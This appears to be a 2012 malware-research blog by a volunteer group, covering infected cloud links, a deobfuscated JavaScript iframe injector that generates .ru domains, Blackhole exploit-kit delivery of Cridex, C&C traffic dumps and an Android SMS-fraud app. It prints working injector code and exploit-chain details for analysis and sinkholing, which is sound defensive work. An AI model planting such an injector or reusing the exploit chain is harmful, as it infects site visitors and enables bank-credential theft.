Monday, October 29, 2012

The crusaders' note : When #malware infector goes to Cloud - Part 2 : Amazon-AWS loaded with Trojan Bank Spy/Downloaders

Amazon-AWS, a famous Cloud, is loaded with Trojan Banking Malwares which found injected via some users like: junormario, flashssa, twttreng etc etc...
Infection dates are from October 27th to NOW. And these links of infection is found in spam emails already, means is in the wild/on going scheme! These trojan were found with the direct link/url download or with the IFRAME pattern. Moreover most infected download is on HTTPS..
The analysis details case by case is obviously don't need for these infection, since the VT analysis explains all details correctly. We shared this with really hoping and expecting the cleanup act to be conducted soon...
Below is the infection disclosure:
h00ps:// VT(31/43)
h00ps://  VT(31/44)
h00ps:// VT(34/44)
h00ps:// VT(28/43)
h00ps:// VT(31/44)
h00ps:// Trojan/Downloader/Banload VT(31/44)


The crusaders' note : Suspected JS/RunForrestRun aka PseudoRandom's NEW bad actor scheme is on going..

Following the previous blog posts, the cases of PseudoRandom or JS/RunForrestRun infector, in this Crusade we found the new bad actor's scheme is spreading new infection using this malicious obfuscation random infector.
We released the details in our pastebin here: --->>[PASTEBIN], and will summarize the details as per follows:
NEW infectors is popping up since Oct26th as per below urls:


The decoded PseudoRandom is as per below hexed ones..
function nextRandomNumber(){
  var hi = this .seed / this .Q;
  var lo = this .seed % this .Q;
  var test = this .A * lo - this .R * hi;
  if (test > 0){
    this .seed = test;
  else {
    this .seed = test + this .M;
  return (this .seed * this .oneOverM);
function RandomNumberGenerator(unix){
  var d = new Date(unix * 1000);
  var s = d.getHours() > 12 ? 1 : 0;
  this .seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.
  round(s * 0xFFF));
  this .A = 48271;
  this .M = 2147483647;
  this .Q = this .M / this .A;
  this .R = this .M % this .A;
  this .oneOverM = 1.0 / this .M;
  this .next = nextRandomNumber;
  return this ;
function createRandomNumber(r, Min, Max){
  return Math.round((Max - Min) * + Min);
function generatePseudoRandomString(unix, length, zone){
  var rand = new RandomNumberGenerator(unix);
  var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o'
  , 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'];
  var str = '';
  for (var i = 0; i < length; i ++ ){
    str += letters[createRandomNumber(rand, 0, letters.length - 1)];
  return str + '.' + zone;
setTimeout(function (){
  try {
    if (typeof iframeWasCreated == "undefined"){
      iframeWasCreated = true;
      var unix = Math.round( + new Date() / 1000);
      var domainName = generatePseudoRandomString(unix, 16, 'ru');
      ifrm = document.createElement("IFRAME");
      ifrm.setAttribute("src", "h00p://" + domainName + "/runforestrun?sid=botnet2"); = "0px"; = "0px"; = "hidden";
  catch (e){
, 500);
All urls were extracted as per below snips, the complete - urls is as per pasted here:--->>[PASTEBIN]
Sat Dec 31 19:00:01 EST 2011-
Sun Jan 1 07:30:00 EST 2012-
Sun Jan 1 19:59:59 EST 2012-
Mon Jan 2 08:29:58 EST 2012-
Mon Jan 2 20:59:57 EST 2012-
Tue Jan 3 09:29:56 EST 2012-
Tue Jan 3 21:59:55 EST 2012-
Wed Jan 4 10:29:54 EST 2012-
Wed Jan 4 22:59:53 EST 2012-
Thu Jan 5 11:29:52 EST 2012-
Thu Jan 5 23:59:51 EST 2012-
Fri Jan 6 12:29:50 EST 2012-
Sat Jan 7 00:59:49 EST 2012-
Sat Jan 7 13:29:48 EST 2012-
(and so on...)
The moral of this findings are: 1. This time Pseudorandom not extracted domains BUT full infected URLs. 2. The double or maybe tripple obfuscation found in recent Pseudorandom landing html.

#MalwareMustDie! (Special thanks to EO for great crack!!)

The crusaders' note: Found the CNC of TrojDownloader/Backdoor/Spy in GoDaddy

We know how GoDaddy is quite popular to be used as victim of infector, but this time we found the rare case which showing hard proof that GoDaddy is being used as CNC server of the Trojan which Download other stuff, implementing Backdoor and Spying/send information to CNC.
It is well written in our pastebin here:--->>[PASTEBIN] so I'm not going to repeat writing it again here. but I pasted below the GoDaddy CNC PoC only:
//CNC Remote Access:
Port: TCP/1433
Protocol: Unknown

NetRange: -
OriginAS:       AS26496
NetName:        GO-DADDY-COM-LLC
   Registered through:
      Created on: 24-May-11
      Expires on: 24-May-21
      Last Updated on: 20-Jun-11

//Communication Details↓

Data sent:
1201 0034 0000 0000 0000 1500 0601 001b    ...4............
0001 0200 1c00 0c03 0028 0004 ff08 0001    .........(......
5500 0000 4d53 5351 4c53 6572 7665 7200    U...MSSQLServer.
b004 0000                                  ....
Data received:
0401 0025 0000 0100 0000 1500 0601 001b    ...%............
0001 0200 1c00 0103 001d 0000 ff0a 3210    ..............2.
a700 0000 00                               .....
Data received:
0401 0025 0000 0100 0000 1500 0601 001b    ...%............
0001 0200 1c00 0103 001d 0000 ff0a 3210    ..............2.
a700 0000 00                               .....
Data sent:
1201 004e 0000 0000 1603 0100 4101 0000    ...N........A...
3d03 014d 6ed2 fa41 7a79 d17f 599e 3b32    =..Mn..Azy..Y.;2
9aea 9e90 f45a 4818 b6e7 bf80 ff67 1be2    .....ZH......g..
3c4c 2e00 0016 0004 0005 000a 0009 0064    <L.............d
0062 0003 0006 0013 0012 0063 0100         .b.........c..
Data received:
1201 0262 0000 0000 1603 0102 5502 0000    ...b........U...
4603 0150 8ada 9c4c ffea 4ba0 be32 bd85    F..P...L..K..2..
7120 3126 edce 653b dba6 1437 a061 8fba    q 1&..e;...7.a..
c2d6 2420 7c2a 0000 da01 e188 e247 4e70    ..$ |*.......GNp
82a0 da01 de9a a672 dca9 34c6 c756 3ac9    .......r..4..V:.
5ce0 c2e6 0005 000b 0002 0300 0200 0001    \...............
fd30 8201 f930 8201 62a0 0302 0102 0210    .0...0..b.......
3fd7 0913 e161 b0b0 4a0c 5d54 1ee0 57a4    ?....a..J.]T..W.
300d 0609 2a86 4886 f70d 0101 0505 0030    0...*.H........0
3b31 3930 3706 0355 0403 1e30 0053 0053    ;1907..U...0.S.S
004c 005f 0053 0065 006c 0066 005f 0053    .L._.S.e.l.f._.S
0069 0067 006e 0065 0064 005f 0046 0061    .i.g.n.e.d._.F.a
006c 006c 0062 0061 0063 006b 301e 170d    .l.l.b.a.c.k0...
3132 3130 3132 3037 3430 3234 5a17 0d34    121012074024Z..4
3231 3031 3230 3734 3032 345a 303b 3139    21012074024Z0;19
3037 0603 5504 031e 3000 5300 5300 4c00    07..U...0.S.S.L.
5f00 5300 6500 6c00 6600 5f00 5300 6900    _.S.e.l.f._.S.i.
6700 6e00 6500 6400 5f00 4600 6100 6c00    g.n.e.d._.F.a.l.
6c00 6200 6100 6300 6b30 819f 300d 0609    l.b.a.c.k0..0...
2a86 4886 f70d 0101 0105 0003 818d 0030    *.H............0
8189 0281 8100 b723 bf01 a2c2 4948 6867    .......#....IHhg
4013 9a8f 60df 5931 0079 ab9d 86ec faae    @...`.Y1.y......
6a29 ca24 310a 9503 49c5 1a68 fba7 6e27    j).$1...I..h..n'
0194 806c 984c 7d9f d9a7 bf1b 4a21 2ac4    ...l.L}.....J!*.
f991 15d0 78ec 3616 3fbd 2e29 284b 4fe6    ....x.6.?..)(KO.
95d9 1652 c074 bfef 7011 f49c f298 d049    ...R.t..p......I
3644 83fc 6b45 c073 33c4 11d2 c643 5c54    6D..kE.s3....C\T
366d bed7 1f32 95e0 66af 1b5a 1705 44df    6m...2..f..Z..D.
e2dd bbdd 4a5b 0203 0100 0130 0d06 092a    ....J[.....0...*
8648 86f7 0d01 0105 0500 0381 8100 3fb9    .H............?.
2a04 9d21 a08b 246d 50b5 c6fa f43c 2068    *..!..$mP....< h
06b4 1fe8 8d87 63d9 db8c e26a 0350 1b4e    ......c....j.P.N
43f6 0028 d949 509b 40f7 45fd 1704 77ff    C..(.IP.@.E...w.
43ac 7691 9e3e 904e 2865 383e 92d4 36f2    C.v..>.N(e8>..6.
f288 a1c1 17de fe1a d802 5845 5441 84a0    ..........XETA..
2a44 ccc1 3255 73fa 5a1b 00b4 1a5d 99e6    *D..2Us.Z....]..
9f70 e7bf 180a e038 3b8d d062 529e 1454    .p.....8;..bR..T
47af e431 03ba e29b 4427 655e 604f 0e00    G..1....D'e^`O..
0000                                       ..
Data sent:
1201 00c2 0000 0000 1603 0100 8610 0000    ................
8200 80b3 d498 e24c 1dc7 f64f 3936 9003    .......L...O96..
39d8 b500 6b69 b224 8f6f c28c 2a3b 239f$.o..*;#.
2a58 c8df 5e25 2152 d16d e2e5 0734 8428    *X..^%!R.m...4.(
d297 2ef1 debe 114d 5a1e 0831 168f 26ce    .......MZ..1..&.
f3c9 3d51 d3a2 1e8b ccf2 a795 ccef de18    ..=Q............
bc05 c33c 533b a4d5 30ba f192 18e8 4699    ...<S;..0.....F.
91fd 601a 74df 2f1d 7db2 095f 9964 ef04    ..`.t./.}.._.d..
5606 3231 8a02 9fa7 37f5 90d2 ea8f bb68    V.21....7......h
3a39 6414 0301 0001 0116 0301 0024 b7cd    :9d..........$..
6104 1932 a285 637a e79e fd73 42bb df15
b6d2 7ae9 5b4d 878b a986 c41d 059e 5e83    ..z.[M........^.
7486                                       t.
Data received:
1201 0037 0000 0000 1403 0100 0101 1603    ...7............
0100 2409 770c ced7 501f 2755 01f9 2a55    ..$.w...P.'U..*U
d935 2976 c9f4 4614 0b0e 908a cc33 bae1    .5)v..F......3..
51d0 5b6c 6963 79                          Q.[licy
Data received:
0000 0000 0000                             ......

Hope this report will make Godaddy clean up the CNC soon.


The crusaders' note : New BHEK2 actor spreads Zbot P2P sets

Went home after a full week work-trip made me in the mood to decode malwares. Rest a while and went straight to start crusade in #MalwareMustDie.
This weekend we found many interesting things, one of them is as per written in this title.
Most of the details is already written well in our pastebin here:--->>[PASTEBIN]
Please see the pastebin data before you continue.
So this blog is about the conclusion, as below:
1. This time BHEK2 was being used to spread Zbot p2p version/GameOver
2. BHEK2 was used to aim dropping the trojan front infector of this Zbot scheme. 
3. This Zbot does everything, calling mothership, sent data, download others set & drops itself
4. See the network traffic goes in the pastebin, it contacts to some sites
   and download the rest of it.
5. jar and PDF is not as the main for this infection.

Below are snapshots we shared of this investigation in Twitter:

Initial Traffics PCAP while contacting Moothership..

The overall analysis snapshots (bins,captures) as PoC...

The funny stuff during sniffing CNC traffic:

Non nobis Domine, non nobis, sed nomini tuo da Gloriam!

#MalwareMustDie (Special thanks for the great ninja sniper who hinted us this)

Monday, October 22, 2012

(Updated) A tale of mass infection of BHEK2 "border.htm" during ddos storm - Changes in JAR detected - Payload : Cridex - Malware Crusaders Logs

This post is dedicated to the wonderful individuals, came from varied countries and cultures, gathered to be together to push infection of malware down to the very minimum level of infection by agressively researching new infections during their rest/private time in weekends. This is the story of #MalwareMustDie, the malware crusaders with its Team Work Report:

It is a quicky, and since the bad guys is also monitoring us now I'll make it short. Found new update of BHEK2 trends. In the past 2days during ddos storm these landing pages NEW infections had appeared, a large infections of border.htm files has been spotted everywhere. Storms made us slow in detecting these, by the time we found it the infection was already deep spreaded, it was at the time we decided to end the last crusade. So this is the last battle's report:

With some formula we can grab all samples w/o problems:
--23:12:50--  h00p://
           => `column.php'
Connecting to||:8080... connected.
HTTP request sent, awaiting response... 200 OK
HTTP/1.0 200 OK
Server: nginx/1.0.10
Date: Sun, 21 Oct 2012 14:08:38 GMT
Content-Type: text/html; charset=CP-1251
X-Powered-By: PHP/5.3.17-1~dotdeb.0
Vary: Accept-Encoding
Via: 1.0 localhost (squid/3.1.6)
Proxy-Connection: close
Length: unspecified [text/html]
23:12:53 (49.74 KB/s) - `column.php' saved [28835]
File looks like:
$ ls -alF column.php
-rwx------   1 malware mustdie    28835 Oct 21 05:12 column.php*
The data itself contains malc0de as below snips:
<html><head><title></title></head><body><div dqa="
2c6h6h#354860695" 57="96268+37586h5f5c%245829612a)
58&2a5a5" 8="362595768$24511g2c1g(281g2c1g28@1g2c1
43d3b32!3b3331322c^292e322c3e_2" 16="725256f@5f5c2
 if(r){s=s+r;}else break;
With the hexed complete data is here:--->>[PASTEBIN]
As usual it can be deobfs into PluginDetect here:--->>[PASTEBIN]
Which can alternatively be decoded manually like this:---->>[PASTEBIN]

Shortly, this border.htm infections case are using same PluginDetect which infection of Cridex
(we thought was Zbot) with the below steps :

1. Lead to h00p://secondhand4u[.]ru:8080/forum/links/column[.]php
2. Using function (c, b, a) + catching these parameters for Exploits = {d,f,h,m.i.e}
3. Makes you downloads exploit PDF(CVE-2010-0188) & jar component. jar exploits with CVE-2012-0507, flooding AtomicReferenceArray & using cracking singleton method to bypass JRE environment (used IllegalArgumentException, SecurityException, InstantiationException,etc) and push url download command to download a trojan dropper, Our PoC during analyzing jar code is as per snipped below:
IMPORTANT NOTE: This Jar infection marks the first time the BHEK authors have used two forms of obfuscation in the param value field.
The full details of JAR decoded is in here:-->>[MMDCrackTeamBlog] Through PDF & JAR exploits downloads trojan/dropper "via" below urls forms:
(there's a direct download link too but sorry we're not going to expose it here..)

Not only PDF/JAR, PluginDetect will hit you with CVE-2006-0003 (MDAC) w/ActiveX Object : BD96C556-65A3-11D0-983A-00C04FC29E36 to drop trojan malware via msxml2.XMLHTTP to your PC with API: SaveToFile .//..//SOMETHING.exe) As you can see, a triple hit exploit, to same Cridex payload.

4. ↑that PDF and Jar files we post in VT is as per below VT details:

5. You will get exploited by above details & brings you to saved trojan in exe file as, per below PoC:
--01:04:06--  h00p://
           => `column.php@sgvdom=0404070908&ggwkc=3307093738070736060b&xbpknd=03
Connecting to||:8080... connected.
HTTP request sent, awaiting response... 200 OK
HTTP/1.0 200 OK
Server: nginx/1.0.10
Date: Sun, 21 Oct 2012 22:43:38 GMT
Content-Type: application/x-msdownload
X-Powered-By: PHP/5.3.17-1~dotdeb.0
Pragma: public
Expires: Sun, 21 Oct 2012 14:22:22 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="calc.exe"
Content-Transfer-Encoding: binary
Content-Length: 87040
Connection: close
Length: 87,040 (85K) [application/x-msdownload]
100%[====================================>] 87,040       108.56K/s
01:04:10 (108.42 KB/s) - `calc.exe' saved [87040/87040]

VT shows:

MD5: 8e4e7c4bb9908a9488a1be96c5eb230f File size: 85.0 KB ( 87040 bytes ) File name: calc.exe File type: Win32 EXE Tags: peexe Detection: 29 / 43 Date: 2012-10-21 15:17:14 UTC ( 55 分 ago ) URL:

6. Dropped/Self Copied Trojan:
It dropped itself and saved it in %AppData% folder.
Dropper & Memory Inject API / Reversing + Behavior PoC is:

(1) PID: 0x4ac 
File: C:\calc.exe 
Address: 0x4079ce 
   lpExistingFileName: "C:\calc.exe", 
   lpNewFileName: "C:\Documents and Settings\User\Application Data\KB00085031.exe", 
   bFailIfExists: 0x0);
(2) PID: 0x674 
File: C:\Documents and Settings\User\Application Data\KB00085031.exe" 
Address:   0x403822 
   (hProcess: 0x78, 
   lpThreadAttributes: 0x0, 
   dwStackSize: 0x0, 
   lpStartAddress: 0xe5eca0, 
   lpParameter: 0xe50000, 
   dwCreationFlags: 0x0, 
   lpThreadId: 0x0);
PS: original PE sample also self-deleted.

The dropped Trojan (payload) is :

MD5: e86d8403f74bd18de027996abae4156a File size: 84.5 KB ( 86528 bytes ) File name: KB01428194.exe File type: Win32 EXE Tags: peexe Detection: 9 / 43 Date: 2012-10-21 14:48:59 UTC ( 1 時間, 26 分 ago ) URL:

According to the new feature "Behavioutal Information" of VT, this payload trojan did:

Written files...
  C:\DOCUME~1\~1\LOCALS~1\Temp\exp1.tmp.bat (successful)

Copied files...
  SRC: C:\4481dc0cc0fd454ecbbbc9329b1c9da4a875078a3b0693f77ad4e6deea72d1fb
  DST: C:\Documents and Settings\\Application Data\KB00927107.exe (successful)

Deleted files...
  C:\4481dc0cc0fd454ecbbbc9329b1c9da4a875078a3b0693f77ad4e6deea72d1fb (successful)
  C:\DOCUME~1\~1\LOCALS~1\Temp\exp1.tmp.bat (successful)

Created processes...
  C:\WINDOWS\system32\cmd.exe" /c "C:\DOCUME~1\~1\LOCALS~1\Temp\exp1.tmp.bat"" (successful)
  C:\Documents and Settings\\Application Data\KB00927107.exe (successful)

Code injections in the following processes...
  python.exe (successful)
  VBoxTray.exe (successful)
We just finished full behavior test of the dropped Trojan, PoC:

7. The network analysis can be seen here:--->>[PASTEBIN]
With the summary as per below: 
7.1. It requested handshake to 3(three) remote IP: and // I tried this 5 times, same pattern.. no miss.. 7.2. It established connection with 7.3. Send POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1 contains encryption. 7.4. See below for the sample of each unique packet we trapped (Suspected crypted credentials on outgoing packets
8. The registry analysis can be seen here: --->>[PASTEBIN] With the summary as per below:
8.1. Autorun of the dropped trojan 8.2. Cannot expose further yet but many chipers are registered. 8.8. Suspected screenshot templates detected:
..\WinPos1024x768(1).left: 0x000000C0
..\WinPos1024x768(1).left: 0x0000006E
..\WinPos1024x768(1).top: 0x00000027
..\WinPos1024x768(1).top: 0x0000008A
..\WinPos1024x768(1).right: 0x000003E0
..\WinPos1024x768(1).right: 0x0000038E
..\WinPos1024x768(1).bottom: 0x0000027F
..\WinPos1024x768(1).bottom: 0x000002E2
..\WinPos1024x768(1).left: 0x000000C0
..\WinPos1024x768(1).left: 0x0000006E
..\WinPos1024x768(1).top: 0x00000027
..\WinPos1024x768(1).top: 0x0000008A
..\WinPos1024x768(1).right: 0x000003E0
..\WinPos1024x768(1).right: 0x0000038E
..\WinPos1024x768(1).bottom: 0x0000027F
..\WinPos1024x768(1).bottom: 0x000002E2
9. The CNC was solved as per this report:--->>[PASTEBIN] by our member :-)
(additional) According to Contagio is a Cridex: (thanks to @snowfl0w)

As the trophy of the current findings is the head of these malwares as per - below family pic:-)

We are also requested the sample of the current infections by researchers.
Contagio looks busy, so you can download here:--->>[SAMPLE-SET]
(Mention us in twitter for password request)

Cridex Reference: M86 - The Cridex Trojan Targets 137 Financial Organizations in One Go Stop Malvertising - Analysis of Cridex DeepEnd Research - Blackhole & Cridex: Se2 Ep1: Intuit Spam & SSL traffic analysis Contagio - Cridex Analysis using Volatility - by Andre' DiMino Kahu Security - Spear-Phish Leads to Cridex #MalwareMustDie!

Friday, October 19, 2012

Decoding Multilayer JavaScript Packed Deobfuscation Code - Daily Log of Malware Crusaders..

We are following infection case that hit Japan recently announced in blog-->>[CASE: OCJP-074]. I don't think we are "that bad" in decoding JavaScript obfuscation, but I am telling you it will come to a headache sometimes. In this case we are describing the not-so-easy-to-be cracked malware obfuscation code which after being obfuscated was also being packed with JavaScript packer tools, and then being obfuscated again and injected into the infected index.html.
[DISCLAIMER] This is the team work result of #MalwareMustDie, for the security reason we are not going to expose the name of them, yet all of the credits are going to the two terrific decoders in our team. The material written in this blog IS NOT CONTAINING malicious code, however for proofing the theory of these malware codes may causing damage if you're not be careful, so for those who want to learn and try, do it with your own risk
Details is as follows:

The infected code snipped like below:
The original code is as per this pastebin war here-->>[PASTEBIN1] This code is easily be deobfuscated into the following obfuscation code: ↑which the neutralized one you can see it in RAW here--->>[PASTEBIN2] We tried to solved this in some times, and always get into the undefined result, garble of character encoded, seems meaningless i.r.: like below result:
  snip snip
Shortly, firstly, as always, we cracked the code. Secondly, to malware coder, we got a message for you: "You are a lame coder!" And the third is we are sharing the way to decode this to all Good People as follows: 1. Function function(p,a,c,k,e,r) is "unpacking" the 2nd parameter 2. Replace eval with alert or prompt and that will eventually lead to second layer of obfuscation as per snipped below:
Original RAW is here--->>[PASTEBIN3] 3. Look at the last line as per snipped below..
↑simply remove e(s); and replace it with alert(s); 4. Then you will get the below snip code:
// Seems like another piece of Shit from Exploit Kit writers. :P
function nextRandomNumber(){
    var hi=this.seed/this.Q;
    var lo=this.seed%this.Q;
    var test=this.A*lo-this.R*hi;
function RandomNumberGenerator(unix){
    var d=new Date(unix*1000);
    var s=d.getHours()>12?1:0;
    return this

function createRandomNumber(r,Min,Max){
    return Math.round((Max-Min)*

function generatePseudoRandomString(unix,length,zone){
    var rand=new RandomNumberGenerator(unix);
    var letters=['a','b','c','d','e','f','g',
↑is our ol'friend PseudoRandom aka JS/RunForrestRun. 5. If you use our simulation tool for cracking PseudoRandom that we released- at the previous post here---->>[Fuzzy In Cracking PseudoRandom] then you will get - the domains represented by pseudorandom domains from June/1/2012 through - January/1/2014 as per below little parts snips:
1338508801 -
1338517801 -
1338526801 -
1338535801 -
1338544801 -
1338553801 -
1338562801 -
1338571801 -
1338580801 -
1338589801 -
1338598801 -
1338607801 -
1338616801 -
1338625801 -
1338634801 -
1338643801 -
1338652801 -
1338661801 -
1338670801 -
1338679801 -
1338688801 -
1338697801 -
1338706801 -
1338715801 -
1338724801 -
1338733801 - 
   :                :
   :                :
↑the complete list is in the RAW here--->>[PASTEBIN4] 6. URLS for this month can be found by searching for unix times as/below example:
1349049601  OCTOBER-1-2012
1351728001  NOVEMBER-1-2012
7. We are saying that for Good Guys to make Registration to these- domains and SINKHOLE THEM ALL before becoming weaponized by - malware infections! End of story, hope our team effort is useful to prevent further infection and to supress the malware growth into the very minimum level. The credit goes to two gentlemen who spent their resting time due to hectic daily - errands to do good deed to fight against malware! End of story, support us by tweet our beloved below #hashtag, And don't forget to visit our Google Groups site here--->>[LINK] for more tips :-) #MalwareMustDie!!

Monday, October 15, 2012

Evil App: Russian FruitNinja - #Android Backdoor Analysis

This is a contribution of our #MalwareMustDie fellow researcher during his crusading against malware, a research material for the android malware complete from evil code analysis down to its crime aspect which linked to the SMS fraud and more.
This post is also a cross post from (checkmate); done by Sanoop Thomas (@s4n7h0) from InR Labs of NII Consulting. All right reserved to the author.
The research was well done conducted and #MalwareMustDie checked its credibility, you will find it useful as reference research against similar threat.
So here we go..

For my research, I chose to analyze a popular Android application for malwares. But why select a Russian version? Well, it made a compelling case study from analysis perspective that I later found out during my research. The application I selected was popular game called FruitNinja downloaded from Russian Fake Android Store (Figure 1).

Figure 1 : Russian Fake Android App Store

Steps for Analysis:

Note: Application PacKage (APK) is the file format used to distribute and install application in Android phone. This is zip archive/package based on JAR file format which contains the certificates, assets, resources, manifest file, and DalvikEXecutable (DEX) containing the actual program code.

On changing the APK extension to ZIP, I got the extracted archive as shown:

Figure 2 : APK Extracted

AndroidManifest.xml is the Android Binary XML describing the name of the application, version, permission rights, and referenced library resources. To make the file into human readable XML format, I used python script for conversion.

Figure 3: Manifest Permission Audit

Here, the manifest auditing result reveals FruitNinja’s permission of sending and receiving SMS which was catching in the very first glance. Also the resource folder (res) was quite interesting.

Figure 4 : Server-Side Polymorphism

A quick glance to the picture files reveals a common face in all pictures. So, who is that guy? Intrigued, I probed further using Google image search resulting in a Russian Meme Character from “Bestman from Fryazino”. In Russian context, Bestman is a term used as a reference of “witness”

Fryazino Story:

A leprosy user made a series of photos, including a witness from the groom of was at a wedding in the suburban town of Fryazino. On all of them witness depicted in the same posture and same expression. The bestman’s picture (black jacket &white pants) is replicated separately with Photoshop morphing with dark contrast background. A Russian wiki says this guy’s name is “Alex”. But it doesn’t make any sense to the analysis; rather it was just another piece of information. Nevertheless, this picture was found to be in many malwares.

Figure 5 : Original Wittness Picture

Figure 6 : Morphed Witness Picture

But Wait!! How does it matter with FruitNinja?

The main reason is that these “temp” files can change the application fingerprints, and eventually bypass traditional signature based antivirus scanners by providing a different pattern. This is a classical AV bypass technique which is known as server-side polymorphism found in many windows based malwares, and now it’s been found in popular Android applications such as Instagram, Angry birds, etc. Each time when a user downloads the application, it creates a different unique mutated version of the same file.

Analysis of Dalvik Executable File

Dissembling dex file can be done in two ways.  1. Smali Assembler/ Dissembler  2. Dex2Jar Converter

Dex2jar converter is handier as it will generate a java archive (.jar file) which is basically the source code itself. From here on, we can use any Java de-compiler to inspect the source code as shown in the below figure.

Figure 7: Java Decompiler

The first package in the JD-GUI (Java Decompiler) shows C2DM class which is Cloud to Device Messaging Framework. C2DM is a service which provides a simple and lightweight mechanism that helps an application developer send data from server to their applications. This service is usually used to do application updates, but can be also used for malicious purpose such as maintaining Command and Control (C&C) servers.

The second package carries more malicious code. Notice the code at startSendMessages() as shown in the above figure. As expected it is sending SMS to some numbers. But what is that number? And what is it trying to send? Lets’s probe further.

Figure 8: Building MCC Specific Text Message

While analyzing the program code, I noticed that the application is building certain texts messages, as shown in the figure: 8 above; based on an xml file stored in the resource folder. The code checks for certain country codes (ID) here such as Russian Federation (RF), Ukraine (UA), and Kazakhstan (KZ). It then sets the message depends on which country code identified. What if the country code is not from any of these lists? Here, anything apart from this country code will be set as Russian Federation by default.

When Android program gets compiled, all these resource files will get converted as binaries. Using the utility tool apktool, I decodeded everything back to original state. (Figure: 9).

Figure 9: Decoding using apktool

The converted xml file now looks like as shown below (figure 10). A Quick Google translator (to English) reveals it as installation operation message.

Figure 10: Analyzing Parsed XML

Further analyzing the Actor Class, I realized the application build Messages based on the Mobile Country Code (MCC) and the Mobile Network Code (MNC). The application validates mobile country code of Russian Federation (RF), Kazakhstan (KZ) and Ukraine (UA) and the corresponding Operator Code.

Table1: MCC used by the Application

The pseudo code looks like below:

Figure 11 : SMS Fraud Code Logic

The application schedules some tasks (figure 12) such as setting up an alarm for checking the purchase of the application. If it is purchased, it will send only one SMS to the premium number. It sets the initial alarm time as 300000000+systemtime (in milliseconds) which means 83.33 hour after the application gets installed for the first time in the device.

Figure 12: Initial Settings

The scheduler checks for license of the application once in every 50000L+systemtime (in milliseconds) which is 50 Seconds. Eventually the SMS count will get decreased as the application license is getting renewed.

Figure 13: Schedule Checker

As the application continues running as free version, the scheduler keeps checking the license and also keeps spying the stored messages (figure 14) to the preset number.

Figure 14: SMS Spying

Analyzing further (figure15) on the number revealed that it belongs to a Russian Company called PM-Invest Ltd. This website provides an online service for SMS fraud. They have a pool of premium numbers from which some can purchase one of them, and if any of the infected users send message to those numbers, the fraudulent will get a certain commission from PM-Invest Ltd for each SMS.

Figure 15: Premium Number Tacked

Henceforth, the malware cycle function as below:

1. Application gets access to the phone state and extracts MCC and MNC. 2. It then verifies and sets the corresponding premium number. 3. Builds the SMS format to be sent. 4. Checks the application’s license for verifying whether it is evaluation version or purchased one. 5. It checks for the application license every 50 seconds, and decrement the SMS count if it is purchased one and the license has renewed. 6. The application will send SMS to the premium number, once in every 83.33 hours.

The following figure was taken from the fraudulent website which shows their tariff plans and how their system works.

Figure 16: SMS Fraudulent Site Tariff


The malware research analysis was done on the Android application to see the sophistication of real time malware writers and the application internals. Through the legitimate application markets are trying to clean all backdoor versions of application, it was observed that still some of the applications were able to carry malicious code despite all the efforts to plug the loopholes. This may attribute largely for Android because of its open and distributed development model. Following simple safeguards can help users to avoid such serious infections.

Safeguards and General Precautions:

1. Avoid downloading application from unknown 3rd party application stores 2. Verify carefully what are the permission needed for each applications 3. Download applications of legitimate authors, especially famous applications as they can be re-written by a malicious coder with an evil expectation of maximum infections. 4. Use anti-malware/monitoring programs and keep them updated regularly.


1. APK Content: [LINK] 2. DalvikExecutable: [LINK] 3. Server-side Polymorphism: [LINK] 4. C2DM Framework: [LINK] 5. MCC & MNC: [LINK]


Sunday, October 7, 2012

[Updated] Fuzzy in Manual Cracking New PseudoRandom (JS/runforestrun?xxx=) Infector

Tired from lack of sleeping for weekend server-deployment in IDC, arrived home and just join #MalwareMustDie hunting session. Somehow I found myself tracing the latest infections spread by JS/runforestrun?xxx= infection, and found some new information, which I don't think my usually pastebin info-sharing will be enough to express it, so I write in this blog.
I am half sleepy writing this, so if I miss something please kindly forgive..


1. The research material (as per infected ITW/Pseudo Random sites data on Oct 5-6, 2012)

I found the three type of the obfuscation method used based on the original PseudoDrandom or JS/runforestrun?xxx= in the wild currently actively infecting inject-able html files on every websites in internet, pls spare me and just let's call these type as A, B, C:

Type A are the latest known urls which most detection show JS/RunForest.C or JS/RunForest.C.1 The currently alive samples infection urls is as below:

Type B is the urls below, which some scanner shows JS/RunForest.Q
Type C is the urls below, detected as: JS/RunForest.J
2. The fact that obfuscation level is a bit increasing..

Type A is using new obfuscation code like below:

Which uncrackable by automatic tools without using modification.. PS: Malware Names as per check in VT(27/43)--->>[HERE]
MicroWorld-eScan         : Trojan.JS.Iframe.BTN
nProtect                 : Trojan.JS.Iframe.BTN
CAT-QuickHeal            : JS/BlacoleRef.BOP
McAfee                   : JS/
K7AntiVirus              : Trojan
F-Prot                   : JS/IFrame.QW
Norman                   : Blacole.JF
ESET-NOD32               : JS/Kryptik.QN
Avast                    : JS:Agent-ADY [Trj]
Kaspersky                :
BitDefender              : Trojan.JS.Iframe.BTN
Emsisoft                 : Exploit.JS.Blacole!IK
Comodo                   : TrojWare.JS.Agent.EGB
F-Secure                 : Trojan.JS.Iframe.BTN
VIPRE                    : Trojan.JS.Generic (v)
AntiVir                  : JS/RunForest.C.1
McAfee-GW-Edition        : Heuristic.BehavesLike.JS.Infected.G
Sophos                   : Mal/Iframe-AF
Jiangmin                 : Trojan/Script.Gen
Microsoft                : Trojan:JS/BlacoleRef.W
GData                    : Trojan.JS.Iframe.BTN
Commtouch                : JS/IFrame.QW
AhnLab-V3                : JS/Agent
Ikarus                   : Exploit.JS.Blacole
Fortinet                 : JS/Expack.VT!tr
AVG                      : Exploit

Type B is like below code:

<script>var var1=true;var var2=10;var2++;var var6=0.0025;if(var6=
ar5-=0.022;var var6=5685;var6--}var var5=57;var var8=0;do{var var
r var21=4053;if(var21>0.038){var var17=5470;var17--;var var20=22;
ar var32=8980;var32--}function hae(key,mir){var var34=0.031;if(va
r var42=0.009;var42+=0.004;var var43=0;var43+=0.003;var4+='cvCode
0;var53<10;var53++){var var54=null;var54-=0.0082}var3+='BjMxOfXg'
var6-=10;var var64=0.0079;var sux='0123456789ABCDEFGHIJKLMNOPQRST
tr[var1];var var76=0.032;for(var cnt1=0;cnt1<len;cnt1++){function
h);for(var var87=0;var87<5;var87++){var var88=0;var88+=0.008;var 
